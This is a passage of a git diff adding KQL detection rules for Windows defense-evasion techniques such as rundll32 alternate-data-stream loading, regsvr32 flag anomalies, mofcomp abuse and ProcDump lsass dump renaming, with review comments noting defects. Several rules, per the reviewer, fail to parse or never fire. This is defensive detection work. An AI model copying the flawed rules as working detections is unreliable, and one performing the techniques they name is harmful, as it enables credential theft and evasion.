+| where ProcessCommandLine contains ".vbs -register " and ((FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\wscript.exe") or (ProcessVersionInfoOriginalFileName in~ ("cscript.exe", "wscript.exe")))
\ No newline at end of file
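Review bot: In the bcdedit hunk, `ProcessCommandLine contains "deletevalue"` is dead: `contains "delete"` already matches every command line that contains "deletevalue", so the second term adds nothing and should either be dropped or the two verbs distinguished (for example `contains "/delete "` versus `contains "/deletevalue "`). The remaining terms `"import"` and `"network"` are plain substrings and will fire on any argument containing those words; the `bcdedit.exe` image/OriginalFileName restriction keeps that in bounds, but a comment such as `// Verbs are matched as loose substrings on purpose so any switch prefix is caught; precision comes from the image/OriginalFileName check` would record the trade-off. The register_app.vbs hunk on the same line reads fine as is.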
diff --git a/KQL/rules/Defense Evasion/potential_regsvr32_commandline_flag_anomaly.kql b/KQL/rules/Defense Evasion/potential_regsvr32_commandline_flag_anomaly.kql
new file mode 100644
index 00000000..cc96e8e1
--- /dev/null
+++ b/KQL/rules/Defense Evasion/potential_regsvr32_commandline_flag_anomaly.kql
@@ -0,0 +1,12 @@
+// Title: Potential Regsvr32 Commandline Flag Anomaly
+// Author: Florian Roth (Nextron Systems)
+// Date: 2019-07-13
+// Level: medium
+// Description: Detects a potential command line flag anomaly related to "regsvr32" in which the "/i" flag is used without the "/n" which should be uncommon.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.010
+// False Positives:
+// - Administrator typo might cause some false positives
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains " -i:" or ProcessCommandLine contains " /i:" or ProcessCommandLine contains " –i:" or ProcessCommandLine contains " —i:" or ProcessCommandLine contains " ―i:") and FolderPath endswith "\\regsvr32.exe") and (not(ProcessCommandLine contains " -n " or ProcessCommandLine contains " /n " or ProcessCommandLine contains " –n " or ProcessCommandLine contains " —n " or ProcessCommandLine contains " ―n "))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_rundll32_execution_with_dll_stored_in_ads.kql b/KQL/rules/Defense Evasion/potential_rundll32_execution_with_dll_stored_in_ads.kql
new file mode 100644
index 00000000..c81f7dec
--- /dev/null
+++ b/KQL/rules/Defense Evasion/potential_rundll32_execution_with_dll_stored_in_ads.kql
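Review bot: The `/n` exclusion only recognises the flag when it is followed by a space (`" /n "`, `" -n "`, and the dash variants), so a command line that ends in `/n` with no trailing character is not excluded and raises an alert even though the flag is present. A boundary-aware check is cheap and keeps the five dash variants in one place: `not(ProcessCommandLine matches regex @"(?i)\s[-/–—―]n(\s|$)")` (RE2 syntax, which KQL's `matches regex` uses). The positive side correctly requires the colon form `i:`, but a comment like `// "/i:" present without "/n" is the anomaly; the Unicode dash variants cover copy-pasted or normalised command lines` would explain why the same flag is spelled five ways.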
@@ -0,0 +1,10 @@
+// Title: Potential Rundll32 Execution With DLL Stored In ADS
+// Author: Harjot Singh, '@cyb3rjy0t'
+// Date: 2023-01-21
+// Level: high
+// Description: Detects execution of rundll32 where the DLL being called is stored in an Alternate Data Stream (ADS).
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1564.004
+
+DeviceProcessEvents
+| where ProcessCommandLine matches regex "[Rr][Uu][Nn][Dd][Ll][Ll]32(\\.[Ee][Xx][Ee])? \\S+?\\w:\\S+?:" and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_script_proxy_execution_via_cl_mutexverifiers_ps1.kql b/KQL/rules/Defense Evasion/potential_script_proxy_execution_via_cl_mutexverifiers_ps1.kql
new file mode 100644
index 00000000..6990e807
--- /dev/null
+++ b/KQL/rules/Defense Evasion/potential_script_proxy_execution_via_cl_mutexverifiers_ps1.kql
@@ -0,0 +1,10 @@
+// Title: Potential Script Proxy Execution Via CL_Mutexverifiers.ps1
+// Author: Nasreddine Bencherchali (Nextron Systems), oscd.community, Natalia Shornikova, frack113
+// Date: 2022-05-21
+// Level: medium
+// Description: Detects the use of the Microsoft signed script "CL_mutexverifiers" to proxy the execution of additional PowerShell script commands
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1216
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -nologo -windowstyle minimized -file " and FolderPath endswith "\\powershell.exe" and (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe")) and (ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\Windows\\Temp\\")
\ No newline at end of file
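Review bot: In the rundll32 ADS hunk the regex spells out case-insensitivity as `[Rr][Uu][Nn][Dd][Ll][Ll]32(\\.[Ee][Xx][Ee])?`, which is hard to read and easy to break when edited; KQL's `matches regex` is RE2, so `matches regex @"(?i)rundll32(\.exe)? \S+?\w:\S+?:"` expresses the same match with the inline flag and a verbatim string that avoids the doubled backslashes. A short comment stating what the pattern is looking for would also help, e.g. `// Match "rundll32[.exe] <drive>:\path\file:stream" — a second colon after the drive letter means the DLL argument is an NTFS alternate data stream`.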
diff --git a/KQL/rules/Defense Evasion/potential_signing_bypass_via_windows_developer_features.kql b/KQL/rules/Defense Evasion/potential_signing_bypass_via_windows_developer_features.kql
new file mode 100644
index 00000000..76a864cd
--- /dev/null
+++ b/KQL/rules/Defense Evasion/potential_signing_bypass_via_windows_developer_features.kql
@@ -0,0 +1,10 @@
+// Title: Potential Signing Bypass Via Windows Developer Features
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-01-11
+// Level: high
+// Description: Detects when a user enable developer features such as "Developer Mode" or "Application Sideloading". Which allows the user to install untrusted packages.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "TurnOnDeveloperFeatures" and (FolderPath endswith "\\SystemSettingsAdminFlows.exe" or ProcessVersionInfoOriginalFileName =~ "SystemSettingsAdminFlows.EXE") and (ProcessCommandLine contains "DeveloperUnlock" or ProcessCommandLine contains "EnableSideloading")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_signing_bypass_via_windows_developer_features_registry.kql b/KQL/rules/Defense Evasion/potential_signing_bypass_via_windows_developer_features_registry.kql
new file mode 100644
index 00000000..7b5c2d96
--- /dev/null
+++ b/KQL/rules/Defense Evasion/potential_signing_bypass_via_windows_developer_features_registry.kql
@@ -0,0 +1,10 @@
+// Title: Potential Signing Bypass Via Windows Developer Features - Registry
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-01-12
+// Level: high
+// Description: Detects when the enablement of developer features such as "Developer Mode" or "Application Sideloading". Which allows the user to install untrusted packages.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000001)" and (RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\AppModelUnlock" or RegistryKey endswith "\\Policies\\Microsoft\\Windows\\Appx*") and (RegistryKey endswith "\\AllowAllTrustedApps" or RegistryKey endswith "\\AllowDevelopmentWithoutDevLicense")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_suspicious_mofcomp_execution.kql b/KQL/rules/Defense Evasion/potential_suspicious_mofcomp_execution.kql
new file mode 100644
index 00000000..95e665ee
--- /dev/null
+++ b/KQL/rules/Defense Evasion/potential_suspicious_mofcomp_execution.kql
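Review bot: `RegistryKey endswith "\\AllowAllTrustedApps"` and `RegistryKey endswith "\\AllowDevelopmentWithoutDevLicense"` test the key path for what is a value name; in `DeviceRegistryEvents` the value name is reported in `RegistryValueName` and `RegistryKey` stops at `...\AppModelUnlock`, so as written this rule should never fire. `RegistryValueData =~ "DWORD (0x00000001)"` is likewise Sysmon's rendering of a DWORD, and as far as I know MDE reports the data as a plain string, so that comparison needs confirming against a real event (probably `RegistryValueData == "1"`). A closer translation is `| where RegistryValueName in~ ("AllowAllTrustedApps", "AllowDevelopmentWithoutDevLicense") and (RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\AppModelUnlock" or RegistryKey contains "\\Policies\\Microsoft\\Windows\\Appx") and RegistryValueData == "1"`, which also drops the `Appx*` wildcard that `endswith` would take literally. The same Sysmon-TargetObject-to-MDE field mismatch is worth checking in every DeviceRegistryEvents rule this commit adds.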
@@ -0,0 +1,13 @@
+// Title: Potential Suspicious Mofcomp Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-12
+// Level: high
+// Description: Detects execution of the "mofcomp" utility as a child of a suspicious shell or script running utility or by having a suspicious path in the commandline.
+The "mofcomp" utility parses a file containing MOF statements and adds the classes and class instances defined in the file to the WMI repository.
+Attackers abuse this utility to install malicious MOF scripts
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceProcessEvents
+| where (((InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\wsl.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe") or (ProcessCommandLine contains "\\AppData\\Local\\Temp" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "\\WINDOWS\\Temp\\" or ProcessCommandLine contains "%temp%" or ProcessCommandLine contains "%tmp%" or ProcessCommandLine contains "%appdata%")) and (FolderPath endswith "\\mofcomp.exe" or ProcessVersionInfoOriginalFileName =~ "mofcomp.exe")) and (not((ProcessCommandLine contains "C:\\Windows\\TEMP\\" and ProcessCommandLine endswith ".mof" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe"))) and (not((ProcessCommandLine contains "C:\\Windows\\TEMP\\" and ProcessCommandLine endswith ".mof")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_suspicious_windows_feature_enabled_proccreation.kql b/KQL/rules/Defense Evasion/potential_suspicious_windows_feature_enabled_proccreation.kql
new file mode 100644
index 00000000..79ad5087
--- /dev/null
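Review bot: The two description continuation lines (`The "mofcomp" utility parses ...` and `Attackers abuse this utility ...`) carry no `//` prefix, so the file is not valid KQL and will fail to parse the moment it is run; each needs to become `// The "mofcomp" utility parses ...` / `// Attackers abuse this utility ...`, which suggests the converter only prefixes the first line of a multi-line Sigma description. The same defect appears in the next hunk, `Potential Suspicious Windows Feature Enabled - ProcCreation` (`Similar to DISM.exe, this cmdlet ...`), and will recur for every rule with a multi-line description, so the fix belongs in the converter rather than in the individual files. Separately, the first `not(...)` (TEMP path, `.mof` suffix and WmiPrvSE parent) is fully implied by the second `not(... "C:\\Windows\\TEMP\\" ... endswith ".mof")`, so one of the two filters is redundant and the broader one should probably be narrowed or the narrower one dropped.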
+++ b/KQL/rules/Defense Evasion/potential_suspicious_windows_feature_enabled_proccreation.kql
@@ -0,0 +1,14 @@
+// Title: Potential Suspicious Windows Feature Enabled - ProcCreation
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-12-29
+// Level: medium
+// Description: Detects usage of the built-in PowerShell cmdlet "Enable-WindowsOptionalFeature" used as a Deployment Image Servicing and Management tool.
+Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+// False Positives:
+// - Legitimate usage of the features listed in the rule.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "Enable-WindowsOptionalFeature" and ProcessCommandLine contains "-Online" and ProcessCommandLine contains "-FeatureName") and (ProcessCommandLine contains "TelnetServer" or ProcessCommandLine contains "Internet-Explorer-Optional-amd64" or ProcessCommandLine contains "TFTP" or ProcessCommandLine contains "SMB1Protocol" or ProcessCommandLine contains "Client-ProjFS" or ProcessCommandLine contains "Microsoft-Windows-Subsystem-Linux")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_sysinternals_procdump_evasion.kql b/KQL/rules/Defense Evasion/potential_sysinternals_procdump_evasion.kql
new file mode 100644
index 00000000..b1432564
--- /dev/null
+++ b/KQL/rules/Defense Evasion/potential_sysinternals_procdump_evasion.kql
@@ -0,0 +1,12 @@
+// Title: Potential SysInternals ProcDump Evasion
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-01-11
+// Level: high
+// Description: Detects uses of the SysInternals ProcDump utility in which ProcDump or its output get renamed, or a dump file is moved or copied to a different name
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036, attack.t1003.001, attack.credential-access
+// False Positives:
+// - False positives are expected in cases in which ProcDump just gets copied to a different directory without any renaming
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "copy procdump" or ProcessCommandLine contains "move procdump") or ((ProcessCommandLine contains "2.dmp" or ProcessCommandLine contains "lsass" or ProcessCommandLine contains "out.dmp") and (ProcessCommandLine contains "copy " and ProcessCommandLine contains ".dmp ")) or (ProcessCommandLine contains "copy lsass.exe_" or ProcessCommandLine contains "move lsass.exe_")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_system_dll_sideloading_from_non_system_locations.kql b/KQL/rules/Defense Evasion/potential_system_dll_sideloading_from_non_system_locations.kql
new file mode 100644
index 00000000..c953acae
--- /dev/null
+++ b/KQL/rules/Defense Evasion/potential_system_dll_sideloading_from_non_system_locations.kql
@@ -0,0 +1,12 @@
+// Title: Potential System DLL Sideloading From Non System Locations
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-14
+// Level: high
+// Description: Detects DLL sideloading of DLLs usually located in system locations (System32, SysWOW64, etc.).
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001
+// False Positives:
+// - Legitimate applications loading their own versions of the DLLs mentioned in this rule
+
+DeviceImageLoadEvents
+| where (FolderPath endswith "\\aclui.dll" or FolderPath endswith "\\activeds.dll" or FolderPath endswith "\\adsldpc.dll" or FolderPath endswith "\\aepic.dll" or FolderPath endswith "\\apphelp.dll" or FolderPath endswith "\\applicationframe.dll" or FolderPath endswith "\\appvpolicy.dll" or FolderPath endswith "\\appxalluserstore.dll" or FolderPath endswith "\\appxdeploymentclient.dll" or FolderPath endswith "\\archiveint.dll" or FolderPath endswith "\\atl.dll" or FolderPath endswith "\\audioses.dll" or FolderPath endswith "\\auditpolcore.dll" or FolderPath endswith "\\authfwcfg.dll" or FolderPath endswith "\\authz.dll" or FolderPath endswith "\\avrt.dll" or FolderPath endswith "\\batmeter.dll" or FolderPath endswith "\\bcd.dll" or FolderPath endswith "\\bcp47langs.dll" or FolderPath endswith "\\bcp47mrm.dll" or FolderPath endswith "\\bcrypt.dll" or FolderPath endswith "\\bderepair.dll" or FolderPath endswith "\\bootmenuux.dll" or FolderPath endswith "\\bootux.dll" or FolderPath endswith "\\cabinet.dll" or FolderPath endswith "\\cabview.dll" or FolderPath endswith "\\certcli.dll" or FolderPath endswith "\\certenroll.dll" or FolderPath endswith "\\cfgmgr32.dll" or FolderPath endswith "\\cldapi.dll" or FolderPath endswith "\\clipc.dll" or FolderPath endswith "\\clusapi.dll" or FolderPath endswith "\\cmpbk32.dll" or FolderPath endswith "\\cmutil.dll" or FolderPath endswith "\\coloradapterclient.dll" or FolderPath 
endswith "\\colorui.dll" or FolderPath endswith "\\comdlg32.dll" or FolderPath endswith "\\configmanager2.dll" or FolderPath endswith "\\connect.dll" or FolderPath endswith "\\coredplus.dll" or FolderPath endswith "\\coremessaging.dll" or FolderPath endswith "\\coreuicomponents.dll" or FolderPath endswith "\\credui.dll" or FolderPath endswith "\\cryptbase.dll" or FolderPath endswith "\\cryptdll.dll" or FolderPath endswith "\\cryptsp.dll" or FolderPath endswith "\\cryptui.dll" or FolderPath endswith "\\cryptxml.dll" or FolderPath endswith "\\cscapi.dll" or FolderPath endswith "\\cscobj.dll" or FolderPath endswith "\\cscui.dll" or FolderPath endswith "\\d2d1.dll" or FolderPath endswith "\\d3d10_1.dll" or FolderPath endswith "\\d3d10_1core.dll" or FolderPath endswith "\\d3d10.dll" or FolderPath endswith "\\d3d10core.dll" or FolderPath endswith "\\d3d10warp.dll" or FolderPath endswith "\\d3d11.dll" or FolderPath endswith "\\d3d12.dll" or FolderPath endswith "\\d3d9.dll" or FolderPath endswith "\\d3dx9_43.dll" or FolderPath endswith "\\dataexchange.dll" or FolderPath endswith "\\davclnt.dll" or FolderPath endswith "\\dcntel.dll" or FolderPath endswith "\\dcomp.dll" or FolderPath endswith "\\defragproxy.dll" or FolderPath endswith "\\desktopshellext.dll" or FolderPath endswith "\\deviceassociation.dll" or FolderPath endswith "\\devicecredential.dll" or FolderPath endswith "\\devicepairing.dll" or FolderPath endswith "\\devobj.dll" or FolderPath endswith "\\devrtl.dll" or FolderPath endswith "\\dhcpcmonitor.dll" or FolderPath endswith "\\dhcpcsvc.dll" or FolderPath endswith "\\dhcpcsvc6.dll" or FolderPath endswith "\\directmanipulation.dll" or FolderPath endswith "\\dismapi.dll" or FolderPath endswith "\\dismcore.dll" or FolderPath endswith "\\dmcfgutils.dll" or FolderPath endswith "\\dmcmnutils.dll" or FolderPath endswith "\\dmcommandlineutils.dll" or FolderPath endswith "\\dmenrollengine.dll" or FolderPath endswith "\\dmenterprisediagnostics.dll" or FolderPath endswith 
"\\dmiso8601utils.dll" or FolderPath endswith "\\dmoleaututils.dll" or FolderPath endswith "\\dmprocessxmlfiltered.dll" or FolderPath endswith "\\dmpushproxy.dll" or FolderPath endswith "\\dmxmlhelputils.dll" or FolderPath endswith "\\dnsapi.dll" or FolderPath endswith "\\dot3api.dll" or FolderPath endswith "\\dot3cfg.dll" or FolderPath endswith "\\dpx.dll" or FolderPath endswith "\\drprov.dll" or FolderPath endswith "\\drvstore.dll" or FolderPath endswith "\\dsclient.dll" or FolderPath endswith "\\dsparse.dll" or FolderPath endswith "\\dsprop.dll" or FolderPath endswith "\\dsreg.dll" or FolderPath endswith "\\dsrole.dll" or FolderPath endswith "\\dui70.dll" or FolderPath endswith "\\duser.dll" or FolderPath endswith "\\dusmapi.dll" or FolderPath endswith "\\dwmapi.dll" or FolderPath endswith "\\dwmcore.dll" or FolderPath endswith "\\dwrite.dll" or FolderPath endswith "\\dxcore.dll" or FolderPath endswith "\\dxgi.dll" or FolderPath endswith "\\dxva2.dll" or FolderPath endswith "\\dynamoapi.dll" or FolderPath endswith "\\eappcfg.dll" or FolderPath endswith "\\eappprxy.dll" or FolderPath endswith "\\edgeiso.dll" or FolderPath endswith "\\edputil.dll" or FolderPath endswith "\\efsadu.dll" or FolderPath endswith "\\efsutil.dll" or FolderPath endswith "\\esent.dll" or FolderPath endswith "\\execmodelproxy.dll" or FolderPath endswith "\\explorerframe.dll" or FolderPath endswith "\\fastprox.dll" or FolderPath endswith "\\faultrep.dll" or FolderPath endswith "\\fddevquery.dll" or FolderPath endswith "\\feclient.dll" or FolderPath endswith "\\fhcfg.dll" or FolderPath endswith "\\fhsvcctl.dll" or FolderPath endswith "\\firewallapi.dll" or FolderPath endswith "\\flightsettings.dll" or FolderPath endswith "\\fltlib.dll" or FolderPath endswith "\\framedynos.dll" or FolderPath endswith "\\fveapi.dll" or FolderPath endswith "\\fveskybackup.dll" or FolderPath endswith "\\fvewiz.dll" or FolderPath endswith "\\fwbase.dll" or FolderPath endswith "\\fwcfg.dll" or FolderPath endswith 
"\\fwpolicyiomgr.dll" or FolderPath endswith "\\fwpuclnt.dll" or FolderPath endswith "\\fxsapi.dll" or FolderPath endswith "\\fxsst.dll" or FolderPath endswith "\\fxstiff.dll" or FolderPath endswith "\\getuname.dll" or FolderPath endswith "\\gpapi.dll" or FolderPath endswith "\\hid.dll" or FolderPath endswith "\\hnetmon.dll" or FolderPath endswith "\\httpapi.dll" or FolderPath endswith "\\icmp.dll" or FolderPath endswith "\\idstore.dll" or FolderPath endswith "\\ieadvpack.dll" or FolderPath endswith "\\iedkcs32.dll" or FolderPath endswith "\\iernonce.dll" or FolderPath endswith "\\iertutil.dll" or FolderPath endswith "\\ifmon.dll" or FolderPath endswith "\\ifsutil.dll" or FolderPath endswith "\\inproclogger.dll" or FolderPath endswith "\\iphlpapi.dll" or FolderPath endswith "\\iri.dll" or FolderPath endswith "\\iscsidsc.dll" or FolderPath endswith "\\iscsium.dll" or FolderPath endswith "\\isv.exe_rsaenh.dll" or FolderPath endswith "\\iumbase.dll" or FolderPath endswith "\\iumsdk.dll" or FolderPath endswith "\\joinutil.dll" or FolderPath endswith "\\kdstub.dll" or FolderPath endswith "\\ksuser.dll" or FolderPath endswith "\\ktmw32.dll" or FolderPath endswith "\\licensemanagerapi.dll" or FolderPath endswith "\\licensingdiagspp.dll" or FolderPath endswith "\\linkinfo.dll" or FolderPath endswith "\\loadperf.dll" or FolderPath endswith "\\lockhostingframework.dll" or FolderPath endswith "\\logoncli.dll" or FolderPath endswith "\\logoncontroller.dll" or FolderPath endswith "\\lpksetupproxyserv.dll" or FolderPath endswith "\\lrwizdll.dll" or FolderPath endswith "\\magnification.dll" or FolderPath endswith "\\maintenanceui.dll" or FolderPath endswith "\\mapistub.dll" or FolderPath endswith "\\mbaexmlparser.dll" or FolderPath endswith "\\mdmdiagnostics.dll" or FolderPath endswith "\\mfc42u.dll" or FolderPath endswith "\\mfcore.dll" or FolderPath endswith "\\mfplat.dll" or FolderPath endswith "\\mi.dll" or FolderPath endswith "\\midimap.dll" or FolderPath endswith 
"\\mintdh.dll" or FolderPath endswith "\\miutils.dll" or FolderPath endswith "\\mlang.dll" or FolderPath endswith "\\mmdevapi.dll" or FolderPath endswith "\\mobilenetworking.dll" or FolderPath endswith "\\mpr.dll" or FolderPath endswith "\\mprapi.dll" or FolderPath endswith "\\mrmcorer.dll" or FolderPath endswith "\\msacm32.dll" or FolderPath endswith "\\mscms.dll" or FolderPath endswith "\\mscoree.dll" or FolderPath endswith "\\msctf.dll" or FolderPath endswith "\\msctfmonitor.dll" or FolderPath endswith "\\msdrm.dll" or FolderPath endswith "\\msdtctm.dll" or FolderPath endswith "\\msftedit.dll" or FolderPath endswith "\\msi.dll" or FolderPath endswith "\\msiso.dll" or FolderPath endswith "\\msutb.dll" or FolderPath endswith "\\msvcp110_win.dll" or FolderPath endswith "\\mswb7.dll" or FolderPath endswith "\\mswsock.dll" or FolderPath endswith "\\msxml3.dll" or FolderPath endswith "\\mtxclu.dll" or FolderPath endswith "\\napinsp.dll" or FolderPath endswith "\\ncrypt.dll" or FolderPath endswith "\\ndfapi.dll" or FolderPath endswith "\\netapi32.dll" or FolderPath endswith "\\netid.dll" or FolderPath endswith "\\netiohlp.dll" or FolderPath endswith "\\netjoin.dll" or FolderPath endswith "\\netplwiz.dll" or FolderPath endswith "\\netprofm.dll" or FolderPath endswith "\\netprovfw.dll" or FolderPath endswith "\\netsetupapi.dll" or FolderPath endswith "\\netshell.dll" or FolderPath endswith "\\nettrace.dll" or FolderPath endswith "\\netutils.dll" or FolderPath endswith "\\networkexplorer.dll" or FolderPath endswith "\\newdev.dll" or FolderPath endswith "\\ninput.dll" or FolderPath endswith "\\nlaapi.dll" or FolderPath endswith "\\nlansp_c.dll" or FolderPath endswith "\\npmproxy.dll" or FolderPath endswith "\\nshhttp.dll" or FolderPath endswith "\\nshipsec.dll" or FolderPath endswith "\\nshwfp.dll" or FolderPath endswith "\\ntdsapi.dll" or FolderPath endswith "\\ntlanman.dll" or FolderPath endswith "\\ntlmshared.dll" or FolderPath endswith "\\ntmarta.dll" or FolderPath 
endswith "\\ntshrui.dll" or FolderPath endswith "\\oleacc.dll" or FolderPath endswith "\\omadmapi.dll" or FolderPath endswith "\\onex.dll" or FolderPath endswith "\\opcservices.dll" or FolderPath endswith "\\osbaseln.dll" or FolderPath endswith "\\osksupport.dll" or FolderPath endswith "\\osuninst.dll" or FolderPath endswith "\\p2p.dll" or FolderPath endswith "\\p2pnetsh.dll" or FolderPath endswith "\\p9np.dll" or FolderPath endswith "\\pcaui.dll" or FolderPath endswith "\\pdh.dll" or FolderPath endswith "\\peerdistsh.dll" or FolderPath endswith "\\pkeyhelper.dll" or FolderPath endswith "\\pla.dll" or FolderPath endswith "\\playsndsrv.dll" or FolderPath endswith "\\pnrpnsp.dll" or FolderPath endswith "\\policymanager.dll" or FolderPath endswith "\\polstore.dll" or FolderPath endswith "\\powrprof.dll" or FolderPath endswith "\\printui.dll" or FolderPath endswith "\\prntvpt.dll" or FolderPath endswith "\\profapi.dll" or FolderPath endswith "\\propsys.dll" or FolderPath endswith "\\proximitycommon.dll" or FolderPath endswith "\\proximityservicepal.dll" or FolderPath endswith "\\prvdmofcomp.dll" or FolderPath endswith "\\puiapi.dll" or FolderPath endswith "\\radcui.dll" or FolderPath endswith "\\rasapi32.dll" or FolderPath endswith "\\rasdlg.dll" or FolderPath endswith "\\rasgcw.dll" or FolderPath endswith "\\rasman.dll" or FolderPath endswith "\\rasmontr.dll" or FolderPath endswith "\\reagent.dll" or FolderPath endswith "\\regapi.dll" or FolderPath endswith "\\reseteng.dll" or FolderPath endswith "\\resetengine.dll" or FolderPath endswith "\\resutils.dll" or FolderPath endswith "\\rmclient.dll" or FolderPath endswith "\\rpcnsh.dll" or FolderPath endswith "\\rsaenh.dll" or FolderPath endswith "\\rtutils.dll" or FolderPath endswith "\\rtworkq.dll" or FolderPath endswith "\\samcli.dll" or FolderPath endswith "\\samlib.dll" or FolderPath endswith "\\sapi_onecore.dll" or FolderPath endswith "\\sas.dll" or FolderPath endswith "\\scansetting.dll" or FolderPath endswith 
"\\scecli.dll" or FolderPath endswith "\\schedcli.dll" or FolderPath endswith "\\secur32.dll" or FolderPath endswith "\\security.dll" or FolderPath endswith "\\sensapi.dll" or FolderPath endswith "\\shell32.dll" or FolderPath endswith "\\shfolder.dll" or FolderPath endswith "\\slc.dll" or FolderPath endswith "\\snmpapi.dll" or FolderPath endswith "\\spectrumsyncclient.dll" or FolderPath endswith "\\spp.dll" or FolderPath endswith "\\sppc.dll" or FolderPath endswith "\\sppcext.dll" or FolderPath endswith "\\srclient.dll" or FolderPath endswith "\\srcore.dll" or FolderPath endswith "\\srmtrace.dll" or FolderPath endswith "\\srpapi.dll" or FolderPath endswith "\\srvcli.dll" or FolderPath endswith "\\ssp_isv.exe_rsaenh.dll" or FolderPath endswith "\\ssp.exe_rsaenh.dll" or FolderPath endswith "\\sspicli.dll" or FolderPath endswith "\\ssshim.dll" or FolderPath endswith "\\staterepository.core.dll" or FolderPath endswith "\\structuredquery.dll" or FolderPath endswith "\\sxshared.dll" or FolderPath endswith "\\systemsettingsthresholdadminflowui.dll" or FolderPath endswith "\\tapi32.dll" or FolderPath endswith "\\tbs.dll" or FolderPath endswith "\\tdh.dll" or FolderPath endswith "\\textshaping.dll" or FolderPath endswith "\\timesync.dll" or FolderPath endswith "\\tpmcoreprovisioning.dll" or FolderPath endswith "\\tquery.dll" or FolderPath endswith "\\tsworkspace.dll" or FolderPath endswith "\\ttdrecord.dll" or FolderPath endswith "\\twext.dll" or FolderPath endswith "\\twinapi.dll" or FolderPath endswith "\\twinui.appcore.dll" or FolderPath endswith "\\uianimation.dll" or FolderPath endswith "\\uiautomationcore.dll" or FolderPath endswith "\\uireng.dll" or FolderPath endswith "\\uiribbon.dll" or FolderPath endswith "\\umpdc.dll" or FolderPath endswith "\\unattend.dll" or FolderPath endswith "\\updatepolicy.dll" or FolderPath endswith "\\upshared.dll" or FolderPath endswith "\\urlmon.dll" or FolderPath endswith "\\userenv.dll" or FolderPath endswith "\\utildll.dll" or 
FolderPath endswith "\\uxinit.dll" or FolderPath endswith "\\uxtheme.dll" or FolderPath endswith "\\vaultcli.dll" or FolderPath endswith "\\vdsutil.dll" or FolderPath endswith "\\version.dll" or FolderPath endswith "\\virtdisk.dll" or FolderPath endswith "\\vssapi.dll" or FolderPath endswith "\\vsstrace.dll" or FolderPath endswith "\\wbemprox.dll" or FolderPath endswith "\\wbemsvc.dll" or FolderPath endswith "\\wcmapi.dll" or FolderPath endswith "\\wcnnetsh.dll" or FolderPath endswith "\\wdi.dll" or FolderPath endswith "\\wdscore.dll" or FolderPath endswith "\\webservices.dll" or FolderPath endswith "\\wecapi.dll" or FolderPath endswith "\\wer.dll" or FolderPath endswith "\\wevtapi.dll" or FolderPath endswith "\\whhelper.dll" or FolderPath endswith "\\wimgapi.dll" or FolderPath endswith "\\winbio.dll" or FolderPath endswith "\\winbrand.dll" or FolderPath endswith "\\windows.storage.dll" or FolderPath endswith "\\windows.storage.search.dll" or FolderPath endswith "\\windows.ui.immersive.dll" or FolderPath endswith "\\windowscodecs.dll" or FolderPath endswith "\\windowscodecsext.dll" or FolderPath endswith "\\windowsudk.shellcommon.dll" or FolderPath endswith "\\winhttp.dll" or FolderPath endswith "\\wininet.dll" or FolderPath endswith "\\winipsec.dll" or FolderPath endswith "\\winmde.dll" or FolderPath endswith "\\winmm.dll" or FolderPath endswith "\\winnsi.dll" or FolderPath endswith "\\winrnr.dll" or FolderPath endswith "\\winscard.dll" or FolderPath endswith "\\winsqlite3.dll" or FolderPath endswith "\\winsta.dll" or FolderPath endswith "\\winsync.dll" or FolderPath endswith "\\wkscli.dll" or FolderPath endswith "\\wlanapi.dll" or FolderPath endswith "\\wlancfg.dll" or FolderPath endswith "\\wldp.dll" or FolderPath endswith "\\wlidprov.dll" or FolderPath endswith "\\wmiclnt.dll" or FolderPath endswith "\\wmidcom.dll" or FolderPath endswith "\\wmiutils.dll" or FolderPath endswith "\\wmpdui.dll" or FolderPath endswith "\\wmsgapi.dll" or FolderPath endswith 
